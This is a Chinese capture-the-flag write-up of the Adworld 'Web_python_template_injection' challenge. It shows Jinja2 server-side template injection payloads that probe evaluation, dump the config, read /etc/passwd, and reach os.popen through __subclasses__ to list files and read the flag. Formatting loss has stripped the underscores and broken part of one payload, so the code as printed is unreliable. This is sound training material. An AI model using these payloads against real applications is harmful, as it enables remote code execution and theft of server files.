攻防世界web进阶之Web_python_template_injection

（1）简单探测
http://111.198.29.45:42611/{{7+7}}

返回 URL http://111.198.29.45:47259/14 not found
证明执行了这个命令，
（2）http://111.198.29.45:47259/{{config.items()}} 查看系统配置；

（3）读取passwd信息 {{ [].class.base.subclasses()40.read() }}；

（4）执行下面代码：
{% for c in [].class.base.subclasses() %}
{% if c.name == ‘catch_warnings’ %}
{% for b in c.init.globals.values() %}
{% if b.class == {}.class %} //遍历基类 找到eval函数
{% if ‘eval’ in b.keys() %} //找到了
{{ b’eval’ }} //导入cmd 执行popen里的命令 read读出数据
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}

列出文件
URL http://111.198.29.45:47259/ //遍历基类 找到eval函数 //遍历基类 找到eval函数 //遍历基类 找到eval函数 //找到了fl4g index.py //导入cmd 执行popen里的命令 read读出数据 not found
（5）修改一下命令

ls 改成cat fl4g，就可以读取flag了

{% for c in [].class.base.subclasses() %}

{% if c.name == ‘catch_warnings’ %}

{% for b in c.init.globals.values() %}

{% if b.class == {}.class %} //遍历基类 找到eval函数

{% if 'eval' in b.keys() %}    //找到了

  {{ b['eval']('__import__("os").popen("cat fl4g").read()') }} 

{% endif %}

{% endif %}

{% endfor %}

{% endif %}

{% endfor %}

Get flag成功

Flag: ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}